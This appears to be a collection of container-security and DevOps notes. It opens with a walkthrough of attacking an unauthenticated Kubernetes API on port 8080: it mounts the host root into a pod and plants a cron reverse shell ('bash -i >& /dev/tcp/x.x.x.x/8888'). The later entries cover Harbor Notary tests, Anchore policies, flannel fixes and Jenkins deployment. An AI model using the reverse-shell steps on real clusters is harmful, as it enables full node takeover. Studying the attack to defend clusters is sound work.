blog's Issues

Attacking a Kubernetes cluster with unauthorized API access via kubectl

The vulnerability arises when port 8080 is left open and unrestricted.
According to the official documentation, the API Server opens two ports by default: 8080 and 6443. Port 8080 requires no authentication and is meant for testing only; port 6443 requires authentication and is protected by TLS.

Accessing port 8080 directly returns the list of available APIs, for example:
image
The port fingerprint looks like this:
image
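Before reaching for kubectl, the exposed port can be confirmed with a couple of curl requests (a minimal sketch; 1.2.3.4 is a placeholder for the target):

curl -s http://1.2.3.4:8080/          # the unauthenticated API root returns the list of available paths
curl -s http://1.2.3.4:8080/version   # reveals the server's Kubernetes version, handy for matching the kubectl version later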

If the Kubernetes API Server has the Dashboard configured, it can be reached at the /ui path:
image

The host tested here has no Dashboard configured, however, so containers cannot be created through a web UI; the only option is kubectl, the official command-line client. Install kubectl as follows:

cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
EOF
yum install -y kubectl

Try to fetch information about the target:
image

Note that if the client version is newer than the server's, the following error appears and kubectl has to be downgraded:
image

Downgrade kubectl to 1.8.7:

curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.8.7/bin/linux/amd64/kubectl
chmod 777 kubectl
mv /usr/bin/kubectl /usr/bin/kubectl.bak
mv kubectl /usr/bin/kubectl

Check that the version is now 1.8.7; the command runs successfully.
image

Next, create a YAML file on the local machine for a new pod that mounts the node's root filesystem at /mnt inside the container:

apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

Then create the pod with kubectl:

// create the pod from myapp.yaml, then use a cron job to get a reverse shell
> kubectl -s 1.2.3.4:8080 create -f myapp.yaml
// wait for the pod to finish creating
// get an interactive shell inside myapp
> kubectl -s 1.2.3.4:8080 --namespace=default exec -it myapp bash
// write a reverse-shell cron job into the node's crontab
> echo -e "* * * * * root bash -i >& /dev/tcp/x.x.x.x/8888 0>&1\n" >> /mnt/etc/crontab
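Before the exec step it is worth confirming that the pod is actually running and that the node's root filesystem really is mounted; a quick check along these lines (same placeholder API server address as above):

> kubectl -s 1.2.3.4:8080 get pod myapp -o wide       # wait until STATUS shows Running
> kubectl -s 1.2.3.4:8080 exec myapp -- ls /mnt/etc   # the node's /etc should be listed here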

image
image

References:
https://0x0d.im/archives/attack-container-management-platform.html

Testing Harbor's Notary feature

Prerequisites:

  • The client is logged in via docker login xxxxxx

  • The corresponding domain-to-IP mapping has been added to /etc/hosts

  1. With Notary enabled, the Docker client pulls two images, one signed and one unsigned. The pull of the unsigned image fails:
    image

Scenario 1:
On a machine with DOCKER_CONTENT_TRUST=1 and the signing certificate present, an attacker tags a malicious image as an already-signed image and pushes it to the registry, as shown below:
image
Conclusion: even with the certificate, the push still asks for the repository passphrase.

Scenario 2:
On a machine with DOCKER_CONTENT_TRUST=0 and no certificate, an attacker tags a malicious image as an already-signed image and pushes it to the registry, as shown below:
image
image
image

Conclusion: with DOCKER_CONTENT_TRUST=0 the push succeeds without a passphrase, but the image's "signed" flag turns into ×.

Now look at what happens on pull:
image
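For reference, the signed-versus-unsigned pull behaviour can be reproduced on any client roughly like this (registry host and image names are placeholders; port 4443 is assumed to be Harbor's Notary endpoint):

export DOCKER_CONTENT_TRUST=1
export DOCKER_CONTENT_TRUST_SERVER=https://harbor.example.com:4443
docker pull harbor.example.com/library/signed-app:1.0     # succeeds, signature verified
docker pull harbor.example.com/library/unsigned-app:1.0   # fails: no trust data exists for this image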

The "plugin flannel does not support config version" error

Error

On the master the node shows NotReady; checking the logs on the affected node with journalctl -f -u kubelet gives:
image

Cause

According to reports online, the /etc/cni/net.d/10-flannel.conf file is missing the cniVersion field; adding it resolves the issue.

[root@security ops]# cat /etc/cni/net.d/10-flannel.conf
{
  "name": "cbr0",
"cniVersion": "0.2.0",
  "type": "flannel",
  "delegate": {
    "isDefaultGateway": true
  }
}
[root@security ops]# systemctl daemon-reload
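If the node still shows NotReady after the change, restarting kubelet (an extra step not in the original note, but harmless) forces the CNI configuration to be re-read:

[root@security ops]# systemctl restart kubelet
# then check on the master that the node returns to Ready: kubectl get nodes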

Deploying Anchore Engine with docker-compose

1. Commands:

# curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml
# docker-compose up -d

2. Check whether the deployment succeeded:

# docker-compose ps
        Name                      Command               State           Ports         
--------------------------------------------------------------------------------------
root_analyzer_1        /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_api_1             /docker-entrypoint.sh anch ...   Up      0.0.0.0:8228->8228/tcp
root_catalog_1         /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_db_1              docker-entrypoint.sh postgres    Up      5432/tcp              
root_policy-engine_1   /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_queue_1           /docker-entrypoint.sh anch ...   Up      8228/tcp     
# docker-compose exec api anchore-cli system status
Service analyzer (anchore-quickstart, http://analyzer:8228): up
Service simplequeue (anchore-quickstart, http://queue:8228): up
Service apiext (anchore-quickstart, http://api:8228): up
Service policy_engine (anchore-quickstart, http://policy-engine:8228): up
Service catalog (anchore-quickstart, http://catalog:8228): up

Engine DB Version: 0.0.13
Engine Code Version: 0.7.1

3. Wait for the vulnerability feeds to finish syncing:

# docker-compose exec api anchore-cli system wait
Starting checks to wait for anchore-engine to be available timeout=-1.0 interval=5.0
API availability: Checking anchore-engine URL (http://localhost:8228)...
API availability: Success.
Service availability: Checking for service set (catalog,apiext,policy_engine,simplequeue,analyzer)...
Service availability: Success.
Feed sync: Checking sync completion for feed set (vulnerabilities)...
Feed sync: Checking sync completion for feed set (vulnerabilities)...
...
...
Feed sync: Success.
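Once the feed sync reports Success, a first image scan typically looks like the following (the image name is just an example):

# docker-compose exec api anchore-cli image add docker.io/library/alpine:3.11
# docker-compose exec api anchore-cli image wait docker.io/library/alpine:3.11
# docker-compose exec api anchore-cli image vuln docker.io/library/alpine:3.11 all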

Reference:
https://docs.anchore.com/current/docs/engine/quickstart/

Using the Publish over SSH plugin in Jenkins for remote deployment

1. Create a job

Create a freestyle project named test
image

2. Install the Gogs plugin

Open Manage Jenkins -> Manage Plugins -> Available and type "gogs" in the filter box in the upper right to find the plugin
image

3. Add a webhook

Open the repository (Gogs is used here), then go to Repository Settings -> Manage Webhooks -> Add Webhook -> Gogs
image

4. Configure the webhook

Note that test in job=test is the Jenkins job name; the two must match exactly (a sample payload URL is sketched after the screenshot below).
image
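For reference, the payload URL the Gogs webhook points at usually has this shape (the Jenkins host is a placeholder; the /gogs-webhook endpoint is provided by the Gogs plugin installed in step 2):

http://jenkins.example.com:8080/gogs-webhook/?job=test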

5. Install the Publish over SSH plugin

image

6. Configure Publish over SSH

In Manage Jenkins -> Configure System, find Publish over SSH and configure the remote server's IP, username and password.
Set Remote Directory to /home/ci; this is the remote working directory, and all transferred files will be placed under it.
image

7. Configure the job

In the job's Source Code Management section, select Git and enter the repository URL and credentials:
image

Then under Post-build Actions choose Send build artifacts over SSH

  • Source files: the files to copy; **/* means all files and folders
  • Remote directory: the folder to copy into. Entering test here is combined with the /home/ci configured in step 6, so the files end up in /home/ci/test; if the remote machine has no test folder it is created automatically
  • Exec command: the command to run on the remote machine after the copy finishes. sudo is added because the copy otherwise runs into permission problems. sudo cp -r test/* /www/threat/ copies everything under /home/ci/test into the web root, which completes the remote deployment
    image

Adding an Anchore scan policy

Common commands

  • List policies
#  anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy list
  • Activate a policy (it must be active to take effect in Jenkins)
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy activate policy-check-env
  • Export a policy
# anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy get 2c53a13c-1765-11e8-82ef-23527761d060 --detail > policybundle.json
  • Run a policy evaluation
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  evaluate check zj1244/demo:10 --policy policy-check-env --detail
  • Add a policy
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy add anchore_policy.json
  • Delete a policy
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy del policy-check-env

Scanning a Dockerfile for sensitive information

Add a policy

The simplest possible policy: check whether the Dockerfile sets a password-like ENV variable:

{
    "blacklisted_images": [],
    "comment": "Default bundle",
    "id": "policy-check-env",
    "mappings": [
        {
            "image": {
                "type": "tag",
                "value": "*"
            },
            "name": "default",
            "policy_id": "policy_1",
            "registry": "*",
            "repository": "*",
            "whitelist_ids": [
            ]
        }
    ],
    "name": "Critical Security Policy",
    "policies": [
        {
            "comment": "Critical vulnerability,  secrets, and best practice violations",
            "id": "policy_1",
            "name": "default",
            "rules": [
                
                {
                    "action": "STOP",
                    "gate": "dockerfile",
                    "id": "test_1",
                    "params": [
                        {
                            "name": "instruction",
                            "value": "ENV"       // which Dockerfile instruction to check
                        },
                        {
                            "name": "check",
                            "value": "like"
                        },
                        {
                            "name": "value",
                            "value": ".*PASS.*"
                        }
                    ],
                    "trigger": "instruction"     // which trigger type to use
                }

                
            ],
            "version": "1_0"
        }
    ],
    "version": "1_0",
    "whitelisted_images": [],
    "whitelists": [
        
    ]
}

Add the policy

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy add anchore_policy.json
Policy ID: policy-check-env
Active: False
Source: local
Created: 2020-03-30T07:58:32Z
Updated: 2020-03-30T07:58:32Z

Activate the policy

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy activate policy-check-env
Success: policy-check-env activated

Run the evaluation

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  evaluate check zj1244/demo:10 --policy policy-check-env --detail
Image Digest: sha256:dc083990823a30faa6d5f8b425f9fb52bca4341e7f12d2f9f59773dce9cd04ad
Full Tag: docker.io/zj1244/demo:10
Image ID: 780c008ae27248223c23a7e2e3259915fa97adc6c052489d0ff96999e466b21e
Status: fail
Last Eval: 2020-03-30T08:01:50Z
Policy ID: policy-check-env
Final Action: stop
Final Action Reason: policy_evaluation

Gate              Trigger            Detail                                                                                               Status        
dockerfile        instruction        Dockerfile directive 'ENV' check 'like' matched against '.*PASS.*' for line 'PASSWORD 123456'        stop          
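For context, the Dockerfile content that trips this rule is simply an ENV instruction whose value matches .*PASS.*; a minimal illustrative Dockerfile (not the one from the original scan) would be:

FROM alpine:3.11
# the next line is what the ENV / ".*PASS.*" check above flags
ENV PASSWORD 123456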

Jenkins build

When Jenkins runs a build, the policy can be seen taking effect there as well
image

Adding a whitelist

The JSON file in full:

{
    "blacklisted_images": [], 
    "comment": "Default bundle", 
    "id": "2c53a13c-1765-11e8-82ef-23527761d060", 
    "mappings": [
        {
            "id": "c4f9bf74-dc38-4ddf-b5cf-00e9c0074611", 
            "image": {
                "type": "tag", 
                "value": "*"
            }, 
            "name": "default", 
            "policy_id": "48e6f7d6-1765-11e8-b5f9-8b6f228548b6", 
            "registry": "*", 
            "repository": "*", 
            "whitelist_ids": [
                "37fd763e-1765-11e8-add4-3b16c029ac5c"  //和下面白名单的id对应
            ]
        }
    ], 
    "name": "Default bundle", 
    "policies": [
        {
            "comment": "System default policy", 
            "id": "48e6f7d6-1765-11e8-b5f9-8b6f228548b6", 
            "name": "DefaultPolicy", 
            "rules": [
                {
                    "action": "STOP", 
                    "gate": "dockerfile", 
                    "id": "ce7b8000-829b-4c27-8122-69cd59018400", 
                    "params": [
                        {
                            "name": "ports", 
                            "value": "22"
                        }, 
                        {
                            "name": "type", 
                            "value": "blacklist"
                        }
                    ], 
                    "trigger": "exposed_ports"
                }, 
                {
                    "action": "WARN", 
                    "gate": "dockerfile", 
                    "id": "312d9e41-1c05-4e2f-ad89-b7d34b0855bb", 
                    "params": [
                        {
                            "name": "instruction", 
                            "value": "HEALTHCHECK"
                        }, 
                        {
                            "name": "check", 
                            "value": "not_exists"
                        }
                    ], 
                    "trigger": "instruction"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "6b5c14e7-a6f7-48cc-99d2-959273a2c6fa", 
                    "params": [
                        {
                            "name": "max_days_since_sync", 
                            "value": "2"
                        }
                    ], 
                    "trigger": "stale_feed_data"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "3e79ea94-18c4-4d26-9e29-3b9172a62c2e", 
                    "params": [], 
                    "trigger": "vulnerability_data_unavailable"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "6063fdde-b1c5-46af-973a-915739451ac4", 
                    "params": [
                        {
                            "name": "package_type", 
                            "value": "all"
                        }, 
                        {
                            "name": "severity_comparison", 
                            "value": "="
                        }, 
                        {
                            "name": "severity", 
                            "value": "medium"
                        }
                    ], 
                    "trigger": "package"
                }, 
                {
                    "action": "STOP", 
                    "gate": "vulnerabilities", 
                    "id": "b30e8abc-444f-45b1-8a37-55be1b8c8bb5", 
                    "params": [
                        {
                            "name": "package_type", 
                            "value": "all"
                        }, 
                        {
                            "name": "severity_comparison", 
                            "value": ">"
                        }, 
                        {
                            "name": "severity", 
                            "value": "medium"
                        }
                    ], 
                    "trigger": "package"
                }
            ], 
            "version": "1_0"
        }
    ], 
    "version": "1_0", 
    "whitelisted_images": [], 
    "whitelists": [
        {
            "comment": "Default global whitelist", 
            "id": "37fd763e-1765-11e8-add4-3b16c029ac5c", 
            "items": [

{
        "gate": "vulnerabilities",
        "trigger_id": "CVE-2018-11236+*",
        "id": "rule2"
      }
		], 
            "name": "Global Whitelist", 
            "version": "1_0"
        }
    ]
}

trigger_id supports regular expressions; the value to use can be found in the report inside Jenkins
image
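A sketch of loading and exercising this bundle, using the same anchore-cli invocation style as above (the file name whitelist_bundle.json is assumed):

# anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy add whitelist_bundle.json
# anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy activate 2c53a13c-1765-11e8-82ef-23527761d060
# anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 evaluate check zj1244/demo:10 --detail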

References:
https://docs.anchore.com/current/docs/engine/usage/cli_usage/policies/policy_gate_dockerfile/#trigger-instruction
https://mydeveloperplanet.com/2019/02/27/anchore-container-image-scanner-jenkins-plugin/
https://docs.anchore.com/current/docs/overview/concepts/policy/policy_checks/#introduction
https://anchore.com/using-anchore-to-identify-secrets-in-container-images/
https://anchore.com/enforcing-alpine-linux-docker-images-vulnerability-cve-2019-5021-with-anchore/

https://github.com/cloudbees-days/anchore-scan/blob/master/.anchore_policy.json

Kubernetes errors caused by the flannel network

  • Background
    After resetting a node with kubeadm reset and rejoining the cluster with kubeadm join, creating a pod produced the following error:
Failed create pod sandbox: rpc error: code = Unknown desc = failed to set up sandbox container "6b3b6f0758f193395f3bda06e64c583ac9c5ff965a888f9afdc867bad952b01a" network for pod "anchore-anchore-engine-analyzer-5958bf997c-2ngs8": NetworkPlugin cni failed to set up pod "anchore-anchore-ee addr: "cni0" already has an IP address different from 10.244.3.1/24

image

  • Solution
    The root cause is a flannel networking problem; the most direct fix is to reset the node again, as follows:
[root@sec-infoanalysis1-test aevolume]# kubeadm reset
[reset] WARNING: Changes made to this host by 'kubeadm init' or 'kubeadm join' will be reverted.
[reset] Are you sure you want to proceed? [y/N]: y
[preflight] Running pre-flight checks
W1025 10:16:01.329478     393 removeetcdmember.go:79] [reset] No kubeadm config, using etcd pod spec to get data directory
[reset] No etcd config found. Assuming external etcd
[reset] Please, manually reset etcd to prevent further issues
[reset] Stopping the kubelet service
[reset] Unmounting mounted directories in "/var/lib/kubelet"
[reset] Deleting contents of config directories: [/etc/kubernetes/manifests /etc/kubernetes/pki]
[reset] Deleting files: [/etc/kubernetes/admin.conf /etc/kubernetes/kubelet.conf /etc/kubernetes/bootstrap-kubelet.conf /etc/kubernetes/controller-manager.conf /etc/kubernetes/scheduler.conf]
[reset] Deleting contents of stateful directories: [/var/lib/kubelet /etc/cni/net.d /var/lib/dockershim /var/run/kubernetes]

The reset process does not reset or clean up iptables rules or IPVS tables.
If you wish to reset iptables, you must do so manually.
For example:
iptables -F && iptables -t nat -F && iptables -t mangle -F && iptables -X

If your cluster was setup to utilize IPVS, run ipvsadm --clear (or similar)
to reset your system's IPVS tables.

The reset process does not clean your kubeconfig files and you must remove them manually.
Please, check the contents of the $HOME/.kube/config file.
[root@sec-infoanalysis1-test aevolume]# ifconfig  cni0 down
[root@sec-infoanalysis1-test aevolume]# yum install bridge-utils
[root@sec-infoanalysis1-test aevolume]# brctl delbr cni0
[root@sec-infoanalysis1-test aevolume]# ip link delete flannel.1
[root@sec-infoanalysis1-test aevolume]# kubeadm join --token=6nq2co.yjttt4y6udrraq3s 192.168.47.146:6443 --discovery-token-unsafe-skip-ca-verification

Kubernetes commands

Any command run without -n xxx / --namespace xxx operates on the default namespace

List namespaces:

[root@localhost resource-manifests]# kubectl get namespaces
NAME              STATUS   AGE
default           Active   4h11m
kube-node-lease   Active   4h11m
kube-public       Active   4h11m
kube-system       Active   4h11m

Upgrading a deployment

There are two ways to upgrade a deployment: edit it in place, or modify the YAML file.
First method:

[root@localhost resource-manifests]# kubectl get deployments
NAME          READY   UP-TO-DATE   AVAILABLE   AGE
sa-frontend   2/2     2            2           3h34m
[root@localhost resource-manifests]# kubectl edit deployment sa-frontend
Edit cancelled, no changes made.
[root@localhost resource-manifests]# kubectl edit deployment/sa-frontend
Edit cancelled, no changes made.
[root@localhost resource-manifests]# kubectl edit deployment.extensions/sa-frontend
Edit cancelled, no changes made.

Second method:

[root@localhost resource-manifests]# cat sa-frontend-deployment-green.yaml 
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: sa-frontend
spec:
  replicas: 2
  minReadySeconds: 15
  strategy:
    type: RollingUpdate
    rollingUpdate: 
      maxUnavailable: 1
      maxSurge: 1
  template:
    metadata:
      labels:
        app: sa-frontend
    spec:
      containers:
        - image: rinormaloku/sentiment-analysis-frontend:green
          imagePullPolicy: Always
          name: sa-frontend
          ports:
            - containerPort: 80
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl apply -f sa-frontend-deployment-green.yaml --record // use apply for an upgrade; create would fail because a deployment with this name already exists
deployment.extensions/sa-frontend configured
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl rollout status deployment sa-frontend // watch the rollout progress
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 of 2 updated replicas are available...
deployment "sa-frontend" successfully rolled out
[root@localhost resource-manifests]# 

Rolling back to the previous revision

[root@localhost resource-manifests]# kubectl rollout history deployment sa-frontend // list the deployment's revisions
deployment.extensions/sa-frontend 
REVISION  CHANGE-CAUSE
1         <none>         <------ 1 is the revision number
2         kubectl apply --filename=sa-frontend-deployment-green.yaml --record=true

[root@localhost resource-manifests]# kubectl rollout undo deployment sa-frontend --to-revision=1 // roll back to revision 1
deployment.extensions/sa-frontend rolled back
[root@localhost resource-manifests]# kubectl get pods -o wide --all-namespaces
NAME                           READY   STATUS    RESTARTS   AGE   IP            NODE        NOMINATED NODE   READINESS GATES
sa-frontend-66bd785c7f-mhjtc   1/1     Running   0          21m   10.100.0.13   localhost   <none>           <none>
sa-frontend-66bd785c7f-qwhzf   1/1     Running   0          21m   10.100.0.14   localhost   <none>           <none>
sa-logic-798b555684-c6r8b      1/1     Running   0          15m   10.100.0.15   localhost   <none>           <none>
sa-logic-798b555684-wb26v      1/1     Running   0          15m   10.100.0.16   localhost   <none>           <none>
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl get svc // list services
NAME                   TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)        AGE
kubernetes             ClusterIP   10.96.0.1        <none>        443/TCP        4h37m
sa-frontend-nodeport   NodePort    10.111.36.213    <none>        80:31068/TCP   78m
sa-logic               ClusterIP   10.110.167.111   <none>        80/TCP         3m27s
[root@localhost resource-manifests]# kubectl describe service sa-frontend-nodeport // show the service's details
Name:                     sa-frontend-nodeport
Namespace:                default
Labels:                   <none>
Annotations:              <none>
Selector:                 app=sa-frontend
Type:                     NodePort // the Service is exposed on a static port of every cluster node; clients outside the cluster reach it via <NodeIP>:<NodePort>
IP:                       10.111.36.213
Port:                     <unset>  80/TCP // the port on the ClusterIP, reachable only from inside the cluster
TargetPort:               80/TCP // the port the pod listens on, i.e. a process inside the pod serves on this port
NodePort:                 <unset>  31068/TCP // the port opened on each node, i.e. the externally exposed port; allocated randomly by default but can be set explicitly
Endpoints:                10.100.0.13:80,10.100.0.14:80 // the service can also be reached through these cluster-internal pod IPs
Session Affinity:         None
External Traffic Policy:  Cluster
Events:                   <none>

In other words, requests to <any node IP>:NodePort from outside, or to <cluster IP>:Port from inside the cluster, are forwarded to the pods' TargetPort.
image
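A quick way to confirm the three access paths described above, using the addresses from the kubectl output (the first command works from outside the cluster; the other two only from inside):

curl http://<node-ip>:31068/      # NodePort
curl http://10.111.36.213:80/     # ClusterIP:Port
curl http://10.100.0.13:80/       # one pod endpoint (TargetPort) directly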

Inspecting pod details

When a pod fails to come up, inspect its details:

[root@sec-infoanalysis2-test ops]# kubectl describe pod billowing-kudu-hello-helm-5c6689fcf9-qjhbp
Name:           billowing-kudu-hello-helm-5c6689fcf9-qjhbp
Namespace:      default
Priority:       0
Node:           sec-k8s-node1/192.168.47.144
Start Time:     Mon, 21 Oct 2019 15:55:16 +0800
Labels:         app.kubernetes.io/instance=billowing-kudu
                app.kubernetes.io/name=hello-helm
                pod-template-hash=5c6689fcf9
Annotations:    <none>
Status:         Running
IP:             10.244.2.27
Controlled By:  ReplicaSet/billowing-kudu-hello-helm-5c6689fcf9
Containers:
  hello-helm:
    Container ID:   docker://68fdb85c3f78da1c034b17b8f1fd1203c7883b785cb98bc5165f37d157544af2
    Image:          nginx:stable
    Image ID:       docker-pullable://nginx@sha256:dd87b3bba63ff0cf6545fca46c9cdecb3e2ab09cacdbc1a08c1000ab97c76b75
    Port:           80/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Mon, 21 Oct 2019 16:03:04 +0800
    Ready:          True
    Restart Count:  0
    Liveness:       http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Readiness:      http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-m4s9k (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             True 
  ContainersReady   True 
  PodScheduled      True 
Volumes:
  default-token-m4s9k:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-m4s9k
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:
  Type    Reason     Age    From                    Message
  ----    ------     ----   ----                    -------
  Normal  Scheduled  16m    default-scheduler       Successfully assigned default/billowing-kudu-hello-helm-5c6689fcf9-qjhbp to sec-k8s-node1
  Normal  Pulling    16m    kubelet, sec-k8s-node1  Pulling image "nginx:stable"
  Normal  Pulled     8m42s  kubelet, sec-k8s-node1  Successfully pulled image "nginx:stable"
  Normal  Created    8m41s  kubelet, sec-k8s-node1  Created container hello-helm
  Normal  Started    8m41s  kubelet, sec-k8s-node1  Started container hello-helm

Setting a node's role label

[root@infoanalysis2-test ops]# kubectl get nodes
NAME                     STATUS   ROLES    AGE   VERSION
infoanalysis1-test   Ready    node     78d   v1.15.1
infoanalysis2-test   Ready    master   78d   v1.15.1
k8s-node1            Ready    <none>   20s   v1.15.1
[root@infoanalysis2-test ops]# kubectl label nodes k8s-node1 node-role.kubernetes.io/node=
node/k8s-node1 labeled
[root@infoanalysis2-test ops]# kubectl get nodes
NAME                     STATUS   ROLES    AGE   VERSION
infoanalysis1-test   Ready    node     78d   v1.15.1
infoanalysis2-test   Ready    master   78d   v1.15.1
k8s-node1            Ready    node     2m    v1.15.1
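If the label ever needs to be removed again, the standard trailing-dash syntax does it (not shown in the original, added for completeness):

[root@infoanalysis2-test ops]# kubectl label nodes k8s-node1 node-role.kubernetes.io/node-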

Deploying Jenkins on Kubernetes

Install the NFS service

yum install -y nfs-utils

Configure the NFS export

# cat /etc/exports
/data/     *(rw,sync,no_root_squash,no_all_squash)
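After editing /etc/exports, the export can be activated and verified roughly as follows (standard nfs-utils commands, assuming a CentOS 7 host):

# systemctl enable nfs-server && systemctl start nfs-server
# exportfs -rav           # re-export everything listed in /etc/exports
# showmount -e localhost  # /data should appear in the output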

nfs-client-deployment.yaml

#ServiceAccount
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: nfs-client-provisioner
#rbac
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: nfs-client-provisioner-runner
rules:
  - apiGroups: [""]
    resources: ["persistentvolumes"]
    verbs: ["get", "list", "watch", "create", "delete"]
  - apiGroups: [""]
    resources: ["persistentvolumeclaims"]
    verbs: ["get", "list", "watch", "update"]
  - apiGroups: ["storage.k8s.io"]
    resources: ["storageclasses"]
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["events"]
    verbs: ["list", "watch", "create", "update", "patch"]
  - apiGroups: [""]
    resources: ["endpoints"]
    verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]

---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: run-nfs-client-provisioner
subjects:
  - kind: ServiceAccount
    name: nfs-client-provisioner
    namespace: default
roleRef:
  kind: ClusterRole
  name: nfs-client-provisioner-runner
  apiGroup: rbac.authorization.k8s.io
#deployment
---
kind: Deployment
apiVersion: extensions/v1beta1
metadata:
  name: nfs-client-provisioner
spec:
  replicas: 1
  strategy:
    type: Recreate
  template:
    metadata:
      labels:
        app: nfs-client-provisioner
    spec:
      serviceAccountName: nfs-client-provisioner
      containers:
        - name: nfs-client-provisioner
          # image: quay.io/external_storage/nfs-client-provisioner:latest
          image: registry.cn-hangzhou.aliyuncs.com/open-ali/nfs-client-provisioner:latest
          volumeMounts:
            - name: nfs-client-root
              mountPath: /persistentvolumes
          env:
            - name: PROVISIONER_NAME
              value: fuseim.pri/ifs
            - name: NFS_SERVER
              value: 192.168.1.68
            - name: NFS_PATH
              value: /data
      volumes:
        - name: nfs-client-root
          nfs:
            server: 192.168.1.68
            path: /data

nfs-client-class.yaml

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: nfs-storage
provisioner: fuseim.pri/ifs # or choose another name; must match the deployment's PROVISIONER_NAME env var

jenkins-rbac.yaml

# In GKE need to get RBAC permissions first with
# kubectl create clusterrolebinding cluster-admin-binding --clusterrole=cluster-admin [--user=<user-name>|--group=<group-name>]

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jenkins

---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: jenkins
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["create","delete","get","list","patch","update","watch"]
- apiGroups: [""]
  resources: ["pods/exec"]
  verbs: ["create","delete","get","list","patch","update","watch"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get","list","watch"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: jenkins
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: jenkins
subjects:
- kind: ServiceAccount
  name: jenkins

jenkins-pvc.yaml

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: jenkins-home
  annotations:
    volume.beta.kubernetes.io/storage-class: "nfs-storage"
spec:
  accessModes:
  - ReadWriteMany
  resources:
    requests:
      storage: 50G

jenkins-statefulset.yaml

# StatefulSet
---
apiVersion: apps/v1beta1
kind: StatefulSet
metadata:
  name: jenkins
  labels:
    name: jenkins
spec:
  serviceName: jenkins
  replicas: 1
  updateStrategy:
    type: RollingUpdate
  template:
    metadata:
      name: jenkins
      labels:
        name: jenkins
    spec:
      terminationGracePeriodSeconds: 10
      serviceAccountName: jenkins
      containers:
        - name: jenkins
          image: jenkins/jenkins:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
              name: web
              protocol: TCP
            - containerPort: 50000
              name: agent
              protocol: TCP
          resources:
            limits:
              cpu: 1
              memory: 1Gi
            requests:
              cpu: 0.5
              memory: 500Mi
          env:
            - name: LIMITS_MEMORY
              valueFrom:
                resourceFieldRef:
                  resource: limits.memory
                  divisor: 1Mi
            - name: JAVA_OPTS
              # value: -XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap -XX:MaxRAMFraction=1 -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
